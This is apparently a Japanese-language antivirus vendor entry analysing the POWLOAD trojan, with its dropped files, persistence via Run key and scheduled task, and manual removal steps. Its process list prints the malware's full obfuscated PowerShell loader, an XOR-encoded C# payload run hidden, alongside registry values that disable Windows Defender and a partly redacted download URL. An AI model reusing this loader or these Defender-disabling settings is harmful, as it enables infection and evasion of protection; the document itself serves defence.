Trojan.W97M.POWLOAD.TIOIBEKA

2020年2月25日

解析者: Paul Steven Nadera

別名:

a variant of Generik.JGZQRIU trojan (NOD32); Trojan.GenericKD.33348655 (Bitdefender)

プラットフォーム:

Windows

危険度:

ダメージ度:

感染力:

感染確認数:

情報漏えい:

マルウェアタイプ: トロイの木馬型
破壊活動の有無: なし
暗号化:
感染報告の有無: はい

概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

詳細

ファイルサイズ 136,735 bytes

メモリ常駐なし

発見日 2020年2月21日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

%User Temp%\{random characters}.0.cs
%User Temp%\{random characters}.dll
%User Temp%\{random characters}.cmdline
%User Temp%\{random characters}.pdb
%User Temp%\{random characters}.out
%User Temp%\{random characters}.err
%Application Data%\{random characters}.exe
%Application Data%\{random characters}.exe
%Application Data%\{random characters}\{random characters}.exe

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。)

マルウェアは、以下のプロセスを追加します。

powershell -WindowStyle Hidden Yr**+-YYr**+*Yfunction y1cc67 {param($z5a414d)$u778d44='dd1d42';$l4d8ab='';for ($i=0; $i -lt $z5a414d.length;$i+=2){$aa825a=[convert]::ToByte($z5a414d.Substring($i,2),16);$l4d8ab+=[char]($aa825a -bxor $u778d44[($i/2)%$u778d44.length]);}return $l4d8ab;}Yr**+-YYr**+*Y$yde8c4c = '1117580a5312371d4210515f5f11420d5a55443748174057094a63115a460d09544a7d5c1001430b44610116470d5757175f44175d5c0344621d474601091f205d53030a5e17405b07170a11475b0a0311374d4110015c4a7d7d5f11420d5a55443748174057094a7f014009696e4111565e0d07110758531717110b52575d06551f6f7608087809445d161019465f57160a540807004648740a40401d345e0d5a46594676014062160b5225505616014217161b39444111565e0d0711174053100d5244514a1001430a147b0a1061104612155d005600534c2d5f10644616445a025156520250484746160d5f03145d0657065001504d5f6a20585e2d09410b46464c465a01465c01080256161e44215f10464b340b580a4012594413285b53002858064653161d134d6912141153085d5144174505405b0744541c4057160a112d5a4634104344400b5d52554c4746160d5f0314475d5205511d093f205d087d5f140b43101c100f01430a515e5756134814770a10431d645d0d0a455916640d164511555e34165e10515110461839144211065d0d5712171050105d514401491051400a44530b5b5e4408535c02004c2d5f10644616444107500353065048617b0a1061104612095555020c53524811115d5c1044480206510148110b41464411580a40121e5d020105564d5f6a20585e2d09410b46464c467a01465c010802561a560808134814770a10431d645d0d0a4559166010087c0b425729015c0b464b464811375146280542107140160b435952530817544d6912171050105d514401491051400a44470b5d56441e530002054c2d5f10644616445d5c520702571d2d5a46341043445057575c03485d5c10445f0700575305185f44470608580714411005450d57120d0a454457065c5702051c1b1f2d5f1064461644485c065002440c44400b5d52554c4d03070707531c105451015d0000540000050104545c015c161b4d5f58021c4b5c565302090f2d0a453440404a3e54165b1b1f035e105b121107055300565f19780a40621016111e57535053050509435d550350551a1d5c0306521e1d55520702054c460351040b505601000205515501510453535700550100515001550504464d185f5d544c1e5205000550050c597d5c103445161a6801165e4d4f550b105e444151505305000f4f312d5f106446164450535251565919317d5c103445161d075f11580a40120353545c07075259015f5d544c455d060c04564c4b07550653505048550502070348044a50541d0b4146440306010c015152184d4f550b105e444151505305000f4f261d45016f6f441d5501510302594a544c015548011c52544854495d044f5f2d5f10644616445356030657597c0546410c055d4a755e080b522c735e0b0650081c014d5f7c0546410c055d4a775d141d191d505701555748041e06560650071e574d0a1e56565253190a5145442d5f106446164c4b0755065350504a605d2d0a4552001a4d4f011c040255061848560053500248071b5f1152500306005e11335150270858015a4644065452050b00595f01431233015327585b010a454c1d091710430d5a5544030457505659215f125d400b0a5c015a464a235410725d080054166453100c19215a440d165e0a59570a101f374457070d5008725d080054161a7314145d0d5753100d5e0a70531005184f166e3817575150035651134f4d03070707531c1050050155000b5455134d0f500152005d501c200b460a585d0500770d58574c1d00075704534c13545703545004550002015555505603565107500d070051525404035550035504065251535401025c5557540307065157505602015000540703065001540502515104540d07555552540503075105461d1e03510200501b5f34430b5757171762105540102d5f025b12145550560705590a54131462160b5201474137105016407b0a025e4c53075700554d0f62160b520147414a37450546464c1400050601534d0a16514611165f44040919144406585b0744421055460d07111740400d0a56444d03070707531c411016580a53120952065307074d1f4210465b0a03110f5257005257050910000000000000465f4210465b0a0311100d0b52000c3740400d0a564a715f1410485f525d164c580a40120d59015f5d0e0952065307074a28540a53460c5f584f09004d1f531d40574415085506060559720b5a440116454a605d261d45011c5f52530657011c3711531740400d0a564c5d1e564d1d55021b5f10085d02564f5919075c53164d19150d03565050446a120f0254000254053f190d1b004d4414445f5401000702551c28015f03405a394d0a1946571011430a14465d5d07000f4f19';Yr**+-YYr**+*Y$yde8c4c2 = y1cc67($yde8c4c);Yr**+-YYr**+*YAdd-Type -TypeDefinition $yde8c4c2;Yr**+-YYr**+*Y[ofe9bd]::c4833a();Yr**+-YYr**+*YYr**+-YYr**+*YYr**+-YYr**+*Y;
“powershell" Get-MpPreference –verbose
%Application Data%\{random characters}.exe
"%System%\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Yr**+-YYr**+*Y
"%Windows%\Microsoft.NET\Framework\{version}\csc.exe" /noconfig /fullpaths @"%User Temp%\iy26wnze.cmdline"
%Windows%\Microsoft.NET\Framework\{version}\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%User Temp%\RES13BF.tmp" "%User Temp%\CSC1351.tmp"
"%System%\schtasks.exe" /Create /TN "Updates\{random characters}" /XML "%User Temp%\tmp{hex values}.tmp"
"{path}"

(註：%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。. %System%フォルダは、システムフォルダで、いずれのオペレーティングシステム(OS)でも通常、"C:\Windows\System32" です。.. %User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。)

自動実行方法

マルウェアは、作成されたコンポーネントがWindows起動時に自動実行されるよう以下のレジストリ値を追加します。

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
{random characters} = "%Application Data%\{random characters}.exe"

他のシステム変更

マルウェアは、以下のレジストリ値を追加します。

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows Defender\Real-Time Protection
DisableBehaviorMonitoring = 1

HINE\SOFTWARE\Policies\
Microsoft\Windows Defender\Real-Time Protection
DisableBehaviorMonitoring = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows Defender\Real-Time Protection
DisableOnAccessProtection = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows Defender\Real-Time Protection value
DisableScanOnRealtimeEnable = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\
Microsoft\Windows Defender
DisableAntiSpyware = 1

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

http://{BLOCKED}trial.com/jpg/readme.exe

以下のスケジュールされたタスクを追加します：

Name: {random characters}
Trigger: At log on
Action: %Application Data%\{random characters}.exe

対応方法

対応検索エンジン: 9.850

初回 VSAPI パターンバージョン 15.706.04

初回 VSAPI パターンリリース日 2020年2月25日

VSAPI OPR パターンバージョン 15.707.00

VSAPI OPR パターンリリース日 2020年2月26日

手順 1

トレンドマイクロの機械学習型検索は、マルウェアの存在を示す兆候が確認された時点で検出し、マルウェアが実行される前にブロックします。機械学習型検索が有効になっている場合、弊社のウイルス対策製品はこのマルウェアを以下の機械学習型検出名として検出します。

Downloader.VBA.TRX.XXVBAF01FF006

手順 2

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 3

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム（OS）の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル／フォルダ／レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 4

Windowsをセーフモードで再起動します。

[ 詳細 ]

セーフモードでの起動：

• Windows 2000 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows XP の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Server 2003 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「Windows 拡張オプションメニュー」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows Vista、Windows 7 および Windows Server 2008 の場合：

コンピュータを起動させます。
「Windows **** を起動しています・・・」のメッセージが表示されている間に［F8］を押します。
「詳細ブートオプション」が表示されるので、［↓］［↑］キーを使って［セーフモード］を選択し、［Enter］を押します。

• Windows 8、8.1 および Server 2012の場合：

画面の右上隅へマウスポインタを移動し、[チャーム]バーを表示します。
マウスで、[設定]－[PC設定の変更]を選択します。
左側のパネルで、[全般]を選択します。
右側のパネルで、[PCの起動をカスタマイズする]が表示されるまで下にスクロールし、[今すぐ再起動]をクリック。コンピュータが再起動するまで待ちます。
[オプションの選択]メニューで、[トラブルシューティング]－[詳細オプション]－[スタートアップ設定]－[再起動]をクリックします。
[スタートアップ設定]メニューで、[4]キーを押し、「4）セーフモードを有効にする」を選択します。

手順 5

このレジストリ値を削除します。

[ 詳細 ]

警告：レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
レジストリの編集はお客様の責任で行っていただくようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- {random characters} = "%Application Data%\{random characters}\{random characters}.exe”

手順 6

スケジュールされたタスクを削除する

タスク削除の手順に含まれる{タスク名} - {実行するタスク}には以下が当てはまります。

{random characters} - %Application Data%\{random characters}.exe

Windows 2000、Windows XP、Windows Server 2003の場合：

[スタート]→[プログラム]→[アクセサリ]→[システムツール]→[スケジュールされたタスク]をクリックして、スケジュールされたタスクを開きます。
上記の{タスク名} を、[名前]の欄に入力します。
入力した{タスク名} 持つファイルを右クリックします。
[プロパティ]をクリックします。 [実行]フィールドで、表示されている{実行するタスク}を確認します。
上記の{実行するタスク}と文字列が一致するタスクを削除します。

Windows Vista、Windows 7、Windows Server 2008、Windows 8、Windows 8.1、およびWindows Server 2012の場合：

Windowsタスクスケジューラを開きます。
• Windows Vista、Windows 7、Windows Server 2008の場合、[スタート]をクリックし、[検索]フィールドに「taskchd.msc」と入力してEnterキーを押します。
• Windows 8、Windows 8.1、Windows Server 2012の場合、画面の左下隅を右クリックし、[実行]をクリックし、「taskchd.msc」と入力してEnterキーを押します。
左側のパネルで、[タスクスケジューラライブラリ]をクリックします。
中央上部のパネルで、上記の{タスク名}を[名前]の欄に入力します。
中央下部のパネルで、[アクション]タブをクリックします。 [詳細]の欄で、{実行するタスク}を確認します。
文字列が一致するタスクを削除します。

手順 7

以下のファイルを検索し削除します。

[ 詳細 ]

コンポーネントファイルが隠しファイル属性に設定されている場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。

%User temp%\{random characters}.cs%User Temp%\{random characters}.0.cs
%User Temp%\{random characters}.dll
%User Temp%\{random characters}.cmdline
%User Temp%\{random characters}.pdb
%User Temp%\{random characters}.out
%User Temp%\{random characters}.err
%Application Data%\{random characters}.exe
%Application Data%\{random characters}\{random characters}.exe

マルウェアのコンポーネントファイルの削除：

Windows 2000、XP および Server 2003 の場合：

[スタート]-[検索]-[ファイルとフォルダすべて]を選択します。
[ファイル名のすべてまたは一部]に以下のファイル名を入力してください。
%User temp%\{random characters}.cs%User Temp%\{random characters}.0.cs
%User Temp%\{random characters}.dll
%User Temp%\{random characters}.cmdline
%User Temp%\{random characters}.pdb
%User Temp%\{random characters}.out
%User Temp%\{random characters}.err
%Application Data%\{random characters}.exe
%Application Data%\{random characters}\{random characters}.exe
[探す場所]の一覧から[マイコンピュータ]を選択し、[検索]を押します。
検索が終了したら、ファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
註：ファイル名の入力欄のタイトルは、Windowsのバージョンによって異なります。（例：ファイルやフォルダ名の検索の場合やファイル名のすべてまたは一部での検索）

Windows Vista、7、Server 2008、8、8.1 および Server 2012 の場合：

Windowsエクスプローラ画面を開きます。
- Windows Vista、7 および Server 2008 の場合：
  - [スタート]-[コンピューター]を選択します。
- Windows 8、8.1 および Server 2012 の場合：
  - 画面の左下隅を右クリックし、[エクスプローラー]を選択します。
[コンピューターの検索]に、以下を入力します。
%User temp%\{random characters}.cs%User Temp%\{random characters}.0.cs
%User Temp%\{random characters}.dll
%User Temp%\{random characters}.cmdline
%User Temp%\{random characters}.pdb
%User Temp%\{random characters}.out
%User Temp%\{random characters}.err
%Application Data%\{random characters}.exe
%Application Data%\{random characters}\{random characters}.exe
ファイルが表示されたら、そのファイルを選択し、SHIFT+DELETE を押します。これにより、ファイルが完全に削除されます。
註：Windows 7 において上記の手順が正しく行われない場合、マイクロソフトのWebサイトをご確認ください。

手順 8

コンピュータを通常モードで再起動し、最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、「Trojan.W97M.POWLOAD.TIOIBEKA」と検出したファイルの検索を実行してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

ご利用はいかがでしたか？　アンケートにご協力ください